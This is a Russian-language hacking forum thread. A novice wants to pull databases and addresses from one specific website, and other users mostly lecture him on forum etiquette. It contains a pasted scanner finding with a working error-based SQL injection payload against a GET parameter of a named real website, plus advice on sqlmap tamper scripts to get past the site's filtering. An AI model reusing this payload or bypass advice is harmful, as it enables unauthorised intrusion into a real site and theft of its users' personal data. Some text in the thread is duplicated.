Здаров все, кому не лень, кому интересно поговорить и ответить на вопросы нового в этой сфере человком? Буду рад общению, у меня миллиарды вопросов, и хз как найти ответы.
сколько букв...Для начала - не пиши много сообщений с разницей в 3 минуты, пиши одно с промежутком в день.
Ничего в этой сфере в общих чертах кардинально не устаревает, максимум - фундаментально видоизменяется.
В третьих - нет такого вопроса или ответа на него, после которого ты скажешь "ааа, все понял, больше вопросов нет" - это тебе не в шахматы учиться играть, хотя и понимание принципов этой игры не повредит.
В четвертых - тяга к знаниям это хорошо, однако, "самое сложное в работе - что никто не говорит, что именно нужно делать". И никто не будет тратить собственное время за просто так (да и на перспективу, не ясно же что ты за перец) чтоб разжевать тебе все по полочкам. Хочешь учиться - гугли, пробуй, а чтоб никому не мешать (и возможно даже быть полезным) - открой блог в оффтопике и рассказывай, что понял, что изучил, а что осталось не ясным. В процессе дискуссии найдутся те, кто поправят, дополнят, подскажут. Т.е. предложи что-то взамен. Знающий - освежит знания, прочитав твой лог, новичок - присоединится к гуглениям.
В пятых - поменьше мата. бля да нихуя - а сути ноль. тебе тут хата чтоль? здесь сидят спецы, и ты своим апом занимаешь место в сообщениях за день, чтоб я просто посмотрел чему тебя на пикабу научили.
Ну и на последок - правильно сформулированный вопрос уже содержит половину, а то и весь ответ.
актуальныя читал про sql иньекции, и мне показалось, что они совсем не актуальны чтоли?
задавай технические вопросы, что не ясно, ответим, поможемМного что интересного и у вас, и в книгах. Но бля, вся и все сразу нихуя не понять. Например как нужны были мне базы, какой то профессионал сказал, что нужно ебашить sql иньекции. Но прочитав это, я понял что это нихуя ничего не дает. А мне нужны базы , адреса с этиого веб сайта. Конкретно с него. И как дальше действовать?
тебе никто персонально для тебя не будет проводить лекцииЗдаров все, кому не лень, кому интересно поговорить и ответить на вопросы нового в этой сфере человком? Буду рад общению, у меня миллиарды вопросов, и хз как найти ответы.
Certainty
:
URL
:
https://www.fetischpartner.com/index.php/community/geschenke.html?uid_y=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)--%201
Parameter Name
:
uid_y
Parameter Type
:
GET
Attack Pattern
:
1+procedure+analyse(extractvalue(rand()%2cconcat(0x3a%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))))%2c1)--+1
Там как миниум фильтруются скобки. <> () Попробуи тамперы в скулмэп charurlencode, chardoubleurlencode, between, greatest. Итд
не трать время добродушных форумчан и не засоряй форум. Для начала хотя бы основы изучи hxxps://portswigger.net, hxxps://book.hacktricks.xyz/ и почитай раздел /forums/2/